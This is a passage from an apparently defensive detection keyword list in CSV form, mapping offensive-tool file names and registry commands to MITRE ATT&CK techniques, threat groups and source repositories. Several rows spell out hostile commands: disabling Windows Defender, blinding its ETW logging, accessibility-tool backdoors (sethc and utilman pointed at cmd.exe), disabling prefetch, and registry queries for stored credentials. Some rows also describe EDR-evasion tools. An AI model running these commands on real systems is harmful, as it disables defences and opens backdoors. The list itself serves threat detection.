- T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*ReflectiveDll.x86.dll*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*ReflectiveDLLInjection*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ReflectiveDLLInjection.*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*ReflectiveDLLInjection.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*ReflectiveDLLInjection.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*ReflectiveDllInjection.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*Reflective-HackBrowserData*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z
-*Reflective-HackBrowserData*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,1,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z
-*ReflectiveLoader.*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z
-*ReflectiveLoader.c*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*ReflectiveLoader.c*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*ReflectiveLoader.cpp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*ReflectiveLoader.h*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*ReflectiveNTDLL.cpp*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z
-*ReflectiveNTDLL.exe*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z
-*ReflectiveNTDLL.sln*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z
-*ReflectiveNTDLL.vcxproj*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z
-*ReflectiveNtdll-main*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,1,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z
-*ReflectivePick_x64_orig.dll*,offensive_tool_keyword,empire,Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS.
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*ReflectivePick_x86_orig.dll*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*RefleXXion*ntdll.dll*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z
-*RefleXXion.sln*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z
-*RefleXXion-DLL*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z
-*RefleXXion-EXE*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z
-*RefleXXion-main*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z
-*reg add *HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server* /v fDenyTSConnections /t REG_DWORD /d 0 /f*,greyware_tool_keyword,reg,Allowing remote connections to this computer,T1021.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,N/A,7,7,N/A,N/A,N/A,N/A
-*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*,greyware_tool_keyword,reg,Hit F5 a bunch of times when you are at the RDP login screen,T1546.012 - T1059.003 - T1055.001,TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*,greyware_tool_keyword,reg,At the login screen press Windows Key+U and you get a cmd.exe window as SYSTEM.,T1546.012 - T1059.003 - T1055.001,TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-"*reg add *HKLM\SOFTWARE\Policies\Microsoft\Windows Defender""* /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",greyware_tool_keyword,reg,Defense evasion technique disable windows defender,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A
-"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender""*/v *DisableAntiSpyware* /t REG_DWORD /d *1* /f*",greyware_tool_keyword,reg,Disable Real Time Protection,T1562.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v *DisableAntiVirus* /t REG_DWORD /d *1* /f*,greyware_tool_keyword,reg,Disable Real Time Protection,T1562.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v Disable* /t REG_DWORD /d 1 /f*,greyware_tool_keyword,reg,Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*reg add *HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters* /v EnablePrefetcher /t REG_DWORD /f /d 0*,greyware_tool_keyword,reg,Anti forensic - Disabling Prefetch,T1215 - T1562.001 - T1037,TA0008,N/A,N/A,Defense Evasion,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z
-*reg add *HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger* /v *Start* /t REG_DWORD /d *0* /f*,greyware_tool_keyword,reg,Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions,T1562.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,7,N/A,N/A,N/A,N/A
-*reg add *HKLM\System\CurrentControlSet\Services\SecurityHealthService* /v *Start* /t REG_DWORD /d *4* /f*,greyware_tool_keyword,reg,Disable Windows Defender Security Center,T1562.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A
-*REG ADD *igfxCUIService*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation
tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*reg add HKCU\software\policies\microsoft\office\16.0\excel\security /v PythonFunctionWarnings /t REG_DWORD /d 0 /f?*,greyware_tool_keyword,Excel,"prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new - Microsoft Excel feature that allows Python to run within the spreadsheet",T1112 - T1131 - T1204.002,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml,1,0,N/A,7,1,88,10,2023-09-13T20:39:02Z,2022-01-11T07:34:37Z -*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d *,greyware_tool_keyword,reg,Disable Cortex: Change the DLL to a random value,T1547.001 - T1055.001 - T1055.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,8,9,N/A,N/A,N/A,N/A -*reg delete *HKLM\Software\Policies\Microsoft\Windows Defender* /f*,greyware_tool_keyword,reg,Disable Real Time Protection,T1562.001 - T1055.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*,offensive_tool_keyword,reg,Delete run box history,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -"*reg query ""HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON"" /v CACHEDLOGONSCOUNT*",greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z
-*reg query hkcu\software\*\putty\session*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL*,greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z
-*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL*,greyware_tool_keyword,reg,Check if LSASS is running in PPL,T1012 - T1003.003,TA0009 - TA0006,N/A,N/A,Reconnaissance,https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*,greyware_tool_keyword,reg,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,Checking For Hidden Credentials With Appcmd.exe,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-*reg query hklm\software\OpenSSH*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*reg query hklm\software\OpenSSH\Agent*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*reg query hklm\software\realvnc*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*reg query hklm\software\realvnc\Allusers*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
